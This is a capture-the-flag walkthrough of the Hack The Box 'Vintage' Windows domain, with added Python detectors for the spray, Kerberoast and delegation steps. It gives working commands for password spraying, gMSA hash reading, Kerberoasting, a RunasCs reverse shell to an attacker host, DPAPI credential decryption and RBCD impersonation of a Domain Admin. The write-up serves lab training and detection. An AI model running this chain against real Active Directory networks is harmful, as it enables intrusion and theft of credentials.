Vintage
(Hard, Windows)

OVERVIEW

As you can see, we got an IP, and this time we are also given the starting credentials of a valid domain user, so let's begin the enumeration with Nmap.
ENUMERATION

The scan looks normal, so let's use the given credentials against each service. Before that, don't forget to add the domain and the domain controller name to the /etc/hosts file.
Now let's check the SMB service.

As you can see, NTLM authentication is disabled, so normal SMB authentication won't work. We switched to Kerberos authentication using the -k flag, which succeeded, so we can list shares with this authentication.
NOTE: Update your /etc/krb5.conf early to avoid problems later. We know this machine relies on Kerberos authentication, so add the following to your /etc/krb5.conf file:
[libdefaults]
default_realm = VINTAGE.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
[realms]
VINTAGE.HTB = {
kdc = 10.129.231.205
admin_server = 10.129.231.205
}
[domain_realm]
.vintage.htb = VINTAGE.HTB
vintage.htb = VINTAGE.HTB
So I checked the shares above using impacket-smbclient but didn't get anything useful, so let's do RID cycling to enumerate users, computers, groups, etc.
nxc smb 10.129.231.205 -u P.Rosa -p 'Rosaisbest123' -k --rid-brute

We got all the user and computer/machine accounts, so let's make a list of them and save it to users.txt. For the password list (pwd.txt) we use the same names, but without the $ suffix for the machine accounts, as shown below:
gMSA01
dc01
fs01
administrator
guest
krbtgt
m.Rossi
r.Verdi
l.Bianchi
g.Viola
c.Neri
p.Rosa
svc_sql
svc_ldap
svc_ark
c.Neri_adm
l.Bianchi_adm
Now that we have a user list, we can try each user with its own username as the password to see if anyone is using their username as their password.
(NOTE: I already sprayed the Rosaisbest123 password on this list and didn't get anything.)
nxc smb 10.129.231.205 -u users.txt -p pwd.txt -k --no-bruteforce --continue-on-success

So we found that FS01$ uses its username as its password.
This can also be found using BloodHound:
bloodhound-python -u P.Rosa -p Rosaisbest123 -d vintage.htb -ns 10.129.231.205 -c ALL --zip

You can see that the machine account FS01$ is a member of PRE-WINDOWS 2000 COMPATIBLE ACCESS@VINTAGE.HTB.
Computer accounts created as "pre-Windows 2000 compatible" get a password equal to their lowercase username (without the $), so that membership explains the result above.
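From the defender's side, the one-password-per-user spray above leaves a distinctive trail on the DC: many Kerberos pre-authentication failures (event 4771, status 0x18) for distinct accounts from a single source, followed by a TGT (event 4768) for a machine account from that same source. The following Python detector is an added example, not part of the original writeup; the event records and IP addresses in it are constructed to mirror this scenario.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of DC Kerberos events (4771 = pre-auth failed, 4768 = TGT
# issued). Field names follow the Windows Security log; values are made up.
USERS = ["administrator", "guest", "krbtgt", "m.Rossi", "r.Verdi", "l.Bianchi",
         "g.Viola", "c.Neri", "svc_sql", "svc_ldap", "svc_ark"]
EVENTS = [{"id": 4771, "time": f"2024-12-01T10:00:{i:02d}", "TargetUserName": u,
           "IpAddress": "10.10.14.5", "Status": "0x18"} for i, u in enumerate(USERS)]
EVENTS.append({"id": 4768, "time": "2024-12-01T10:00:12", "TargetUserName": "FS01$",
               "IpAddress": "10.10.14.5", "Status": "0x0"})
# Background noise: one user mistyping a password from their own workstation.
EVENTS.append({"id": 4771, "time": "2024-12-01T10:03:00", "TargetUserName": "g.Viola",
               "IpAddress": "10.129.231.40", "Status": "0x18"})

def _ts(e):
    return datetime.fromisoformat(e["time"])

def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {ip: sorted distinct accounts} for sources that fail pre-auth for
    at least `min_accounts` different principals within `window`. One failure
    per account is exactly the shape of a one-password-per-user spray, which a
    per-account lockout threshold never catches."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=_ts):
        if e["id"] == 4771 and e["Status"] == "0x18":   # 0x18 = wrong password
            by_ip[e["IpAddress"]].append(e)
    hits = {}
    for ip, evs in by_ip.items():
        for i, start in enumerate(evs):
            names = {x["TargetUserName"].lower() for x in evs[i:]
                     if _ts(x) - _ts(start) <= window}
            if len(names) >= min_accounts:
                hits[ip] = sorted(names)
                break
    return hits

def machine_tgt_after_spray(events, spray):
    """Machine accounts (name ends in $) granted a TGT from a spraying source:
    the 'computer account uses its name as its password' case."""
    return sorted(e["TargetUserName"] for e in events
                  if e["id"] == 4768 and e["Status"] == "0x0"
                  and e["TargetUserName"].endswith("$") and e["IpAddress"] in spray)

if __name__ == "__main__":
    spray = detect_spray(EVENTS)
    print(spray, machine_tgt_after_spray(EVENTS, spray))
```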
EXPLOITATION
Now that we own the FS01$ machine account, let's continue the enumeration in BloodHound.

As you can see, FS01$, as a member of Domain Computers, has ReadGMSAPassword over GMSA01$@VINTAGE.HTB.
So let's use NetExec to read the gMSA password:
nxc ldap 10.129.231.205 -u fs01$ -p fs01 -k --gmsa

We successfully got the NTLM hash of the gMSA01$ account. Now let's look at the BloodHound data again.

As you can see, the GMSA01$ account has GenericWrite and AddSelf permissions on SERVICEMANAGERS@VINTAGE.HTB.
So let's add the GMSA01$ account to the SERVICEMANAGERS group using bloodyAD:
bloodyAD -d vintage.htb --host dc01.vintage.htb -u gmsa01$ -p "NTLM-HASH" -f rc4 -k add groupMember SERVICEMANAGERS 'gMSA01$'

You can also do this by first getting a TGT for GMSA01$; then you don't have to pass the user, the password hash, or the hash format.
Now that we are a member of the SERVICEMANAGERS group, let's see what this group can do in BloodHound.

As you can see, SERVICEMANAGERS has GenericAll rights on three users. Two of them are enabled, and one, svc_sql, is disabled.

Since SERVICEMANAGERS has GenericAll on these users, we can enable the disabled one and then Kerberoast it.
First, let's obtain a TGT for gMSA01$ to avoid problems later:
getTGT.py vintage.htb/gMSA01$ -hashes :NTLM-HASH
export KRB5CCNAME=gMSA01$.ccache
Now let's remove the ACCOUNTDISABLE flag from the svc_sql user's userAccountControl attribute using bloodyAD:
bloodyAD -d vintage.htb --host dc01.vintage.htb -k remove uac 'svc_sql' -f ACCOUNTDISABLE

As you can see, the ACCOUNTDISABLE flag was successfully removed from the account. Now let's Kerberoast to get the hashes of the three accounts.
We will use the targeted Kerberoast attack:
python3 targetedKerberoast.py -d vintage.htb -k --no-pass --dc-host dc01.vintage.htb

As you can see, we got the svc_sql hash along with the other two, so let's use John to crack these passwords.
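The Kerberoast step above is visible on the DC as event 4769 (service ticket requested) with ticket encryption type 0x17 (RC4), one per targeted service account, all from the same requester within seconds. The detector below is an added example, not part of the original writeup; the events, requester names and IPs are constructed to mirror this page's scenario, and it also shows why an AES (0x12) request or a request for a machine SPN should not fire.

```python
from collections import defaultdict

# Constructed 4769 (Kerberos service ticket requested) events using Windows
# Security-log field names. gMSA01$ asks for RC4 tickets for three service
# accounts in one sweep; the noise is an AES request by a workstation user and
# an RC4 request for a machine SPN (DC01$).
EVENTS = [
    {"id": 4769, "TargetUserName": "gMSA01$@VINTAGE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"id": 4769, "TargetUserName": "gMSA01$@VINTAGE.HTB", "ServiceName": "svc_ldap",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"id": 4769, "TargetUserName": "gMSA01$@VINTAGE.HTB", "ServiceName": "svc_ark",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5"},
    {"id": 4769, "TargetUserName": "g.Viola@VINTAGE.HTB", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.129.231.40"},
    {"id": 4769, "TargetUserName": "g.Viola@VINTAGE.HTB", "ServiceName": "DC01$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.129.231.40"},
]

RC4 = "0x17"  # etype 23: the type Kerberoast tooling requests because it cracks fastest

def rc4_service_tickets(events):
    """Map (requester, ip) -> set of user service accounts for which an RC4
    ticket was issued. Machine SPNs (name ends in $) are skipped: their
    passwords are long and random, so an RC4 ticket for them is not crackable."""
    out = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["TicketEncryptionType"] != RC4:
            continue
        if e["ServiceName"].endswith("$"):
            continue
        out[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    return out

def detect_kerberoast(events, min_services=2):
    """Requesters that pulled RC4 tickets for several distinct service accounts,
    which is what a targetedKerberoast sweep looks like from the DC's side."""
    return {k: sorted(v) for k, v in rc4_service_tickets(events).items()
            if len(v) >= min_services}

if __name__ == "__main__":
    for (who, ip), services in detect_kerberoast(EVENTS).items():
        print(f"{who} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

Setting msDS-SupportedEncryptionTypes on service accounts to AES only removes the RC4 option entirely, so the remaining signal is the burst of 4769 events itself.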

As you can see, we got the svc_sql password. Now let's spray this password across the usernames we collected earlier; it may be reused somewhere.
nxc smb 10.129.231.205 -k -u users.txt -p 'Zer0the0ne'

Here we go: the password also works for the user C.Neri. Let's log in with evil-winrm, as C.Neri is a member of Remote Management Users. WinRM normally uses NTLM authentication, which is disabled here, so we use the Kerberos realm method instead. First grab a TGT for C.Neri:
getTGT.py vintage.htb/C.neri:'Zer0the0ne'
export KRB5CCNAME=C.neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb
NOTE: If you get a KDC_REALM error, fix your /etc/krb5.conf file.
USER FLAG

Now you can get your user flag.
PRIVILEGE ESCALATION
Now let's start enumerating for privilege escalation. Since BloodHound didn't show anything useful for the C.Neri user, let's check for stored credentials first:
cmdkey /list

It showed nothing because cmdkey needs an interactive session with a loaded user profile. The WinRM session is not an interactive logon but a network logon.
You can find a better explanation on the Bitvise blog.
So we can use the RunasCs tool to spawn an interactive session. Let's transfer it into the WinRM session: start a Python HTTP server in the same directory as RunasCs, then in the WinRM shell run:
iwr http://YOUR-IP:PORT/RunasCs.exe -OutFile RunasCs.exe
.\RunasCs.exe C.Neri Zer0the0ne cmd.exe -r ATTACKERIP:PORT
On your listener you will get an interactive shell; run the cmdkey command from above again there.

As you can see, the stored credentials belong to the user c.neri_adm.
We could use Invoke-WCMDump.ps1 to dump the stored credentials, but transferring it to the host triggers the antivirus, which blocks the file. So our second option is
to collect the encrypted credential blob and the DPAPI master keys, derive the key that decrypts the credential blob, and recover the plain-text password.
So let's go back to the evil-winrm shell and run:
cd C:/Users/C.Neri/appdata/roaming/Microsoft
gci -force
You will see two directories that are of use to us:
1) Credentials: contains the encrypted credential blob, which we need to download and decrypt.
2) Protect: contains a directory named after the user's SID, which holds the master keys we need in order to derive the decryption key for the credential blob.
Now let's download these files:
cd C:/Users/C.Neri/appdata/roaming/Microsoft/Credentials
gci -force

You will see this credential blob; download it using:
download C4BB96844A5C9DD45D5B6A9859252BA6
# It will show an error, but ignore it. Then check the directory where you started the evil-winrm session:
# the file will be there when you run ls -la.

You can compare the file size to make sure the download is complete.
Similarly, download the master keys:
cd C:/Users/C.Neri/appdata/roaming/Microsoft/Protect/S-1-5-21-4024337825-2033394866-2055507597-1115/
# (your SID directory may be different, so go to that one; don't just copy this path)
gci -force
# Now download both master keys
download 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847
download 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b
After downloading all three files, go to the directory where they were saved. We will use Impacket's dpapi.py script to derive the key from a master key, then decrypt the credential blob. Let's go:
dpapi.py masterkey -file 4dbf04d8-529b-4b4c-b4ae-8e875e4fe847 -sid S-1-5-21-4024337825-2033394866-2055507597-1115
# Enter the password -> Zer0the0ne
This gives you a decrypted master key. Copy that key and run:
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 'YOUR-KEY'

If you get this padding error, it means this is not the master key we need, so let's try the other one.
Follow the steps above with the other master key file, get the new decrypted key, copy it, and run again:
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 'YOUR-KEY'

Here we go: we got the C.Neri_adm user credentials. Now let's see what this user can do in BloodHound.

We can see that C.NERI_ADM has GenericWrite and AddSelf rights on the DelegatedAdmins group, and

L.Bianchi_adm is a member of DelegatedAdmins and also a Domain Admin. So we can use RBCD (Resource-Based Constrained Delegation): we add an account that has an SPN, in this case the FS01$ machine account, to the group, and then impersonate the DC or a Domain Admin.
So let's do it.
First we have to add C.Neri_adm to the DelegatedAdmins group so that we can then add the FS01$ account to it as well.
(Don't forget to obtain a TGT for the C.Neri_adm user first.)
bloodyAD -d vintage.htb --host dc01.vintage.htb -k add groupMember DELEGATEDADMINS 'C.neri_adm'

Now let's add the FS01$ machine account to DELEGATEDADMINS:
bloodyAD -d vintage.htb --host dc01.vintage.htb -k add groupMember DELEGATEDADMINS 'fs01$'

Now obtain a TGT for FS01$ and export it.
Once it is added successfully, we can start impersonating the DC/Domain Admins, but
we cannot impersonate the Administrator account, as it is restricted from network logons. The L.BIANCHI_ADM account is also a member of Domain Admins, so we impersonate that user in the delegation attack and request the ticket with an alternate service (altservice) of HTTP to get a WinRM session, since WinRM uses the HTTP service class rather than CIFS.
So let's impersonate L.Bianchi_adm directly, as it is the faster approach:
getST.py -spn 'cifs/dc01.vintage.htb' -altservice 'HTTP/dc01.vintage.htb' -impersonate 'l.bianchi_adm' -k -no-pass -dc-ip 10.129.231.205 vintage.htb/fs01$
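Three of the steps above (re-enabling svc_sql, adding accounts to SERVICEMANAGERS and DELEGATEDADMINS, and the S4U2Proxy request impersonating l.bianchi_adm) each produce a distinct DC Security-log event: 4722 (account enabled), 4728 (member added to a security-enabled global group) and 4769 with the TransmittedServices field populated. The following Python detector is an added example, not part of the original writeup; the events are constructed, and the assumption that DelegatedAdmins is the group carrying the delegation rights is taken from the text above.

```python
# Groups whose membership changes deserve an alert; constructed for the
# scenario on this page (DelegatedAdmins is assumed to carry the RBCD rights).
WATCHED_GROUPS = {"servicemanagers", "delegatedadmins", "domain admins"}

# Constructed Security-log events (Windows field names). 4722 = account enabled,
# 4728 = member added to a security-enabled global group, 4769 = service ticket
# requested; TransmittedServices is "-" except for S4U2Proxy delegation.
EVENTS = [
    {"id": 4722, "SubjectUserName": "gMSA01$", "TargetUserName": "svc_sql"},
    {"id": 4728, "SubjectUserName": "gMSA01$", "TargetUserName": "SERVICEMANAGERS",
     "MemberName": "CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb"},
    {"id": 4728, "SubjectUserName": "c.neri_adm", "TargetUserName": "DelegatedAdmins",
     "MemberName": "CN=FS01,CN=Computers,DC=vintage,DC=htb"},
    {"id": 4728, "SubjectUserName": "administrator", "TargetUserName": "Printer Users",
     "MemberName": "CN=g.Viola,CN=Users,DC=vintage,DC=htb"},
    {"id": 4769, "TargetUserName": "l.bianchi_adm@VINTAGE.HTB", "ServiceName": "DC01$",
     "TransmittedServices": "FS01$@VINTAGE.HTB", "IpAddress": "::ffff:10.10.14.5"},
    {"id": 4769, "TargetUserName": "g.Viola@VINTAGE.HTB", "ServiceName": "DC01$",
     "TransmittedServices": "-", "IpAddress": "::ffff:10.129.231.40"},
]

def flagged_group_changes(events):
    """4728 events touching a watched group -> (actor, group, member DN)."""
    return [(e["SubjectUserName"], e["TargetUserName"], e["MemberName"])
            for e in events if e["id"] == 4728
            and e["TargetUserName"].lower() in WATCHED_GROUPS]

def enabled_by_service_principal(events):
    """4722 events where the actor is a machine or gMSA account (name ends in $):
    human admins enable accounts, service principals normally do not."""
    return [(e["SubjectUserName"], e["TargetUserName"])
            for e in events if e["id"] == 4722 and e["SubjectUserName"].endswith("$")]

def delegated_tickets(events, protected=("administrator", "l.bianchi_adm")):
    """S4U2Proxy tickets for protected principals: returns the impersonated user,
    the service that transited the request (the delegating account), and the
    target service."""
    hits = []
    for e in events:
        if e["id"] != 4769 or e.get("TransmittedServices", "-") == "-":
            continue
        user = e["TargetUserName"].split("@")[0].lower()
        if user in protected:
            hits.append((user, e["TransmittedServices"], e["ServiceName"]))
    return hits

if __name__ == "__main__":
    print(flagged_group_changes(EVENTS), enabled_by_service_principal(EVENTS),
          delegated_tickets(EVENTS))
```

Putting Domain Admins such as l.bianchi_adm in the Protected Users group (or marking them "sensitive and cannot be delegated") stops the S4U2Proxy step outright, so the 4769 check above then only needs to cover accounts that cannot be given that protection.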

ROOT FLAG
export KRB5CCNAME=l.bianchi_adm@HTTP_dc01.vintage.htb@VINTAGE.HTB.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb

We successfully got in; now you can grab the root flag.
WE FINALLY DID IT!!!! CHALLENGE SOLVED!!

For any query or problem, either leave a comment or contact me at reapsec.com.
THANKS FOR READING!!!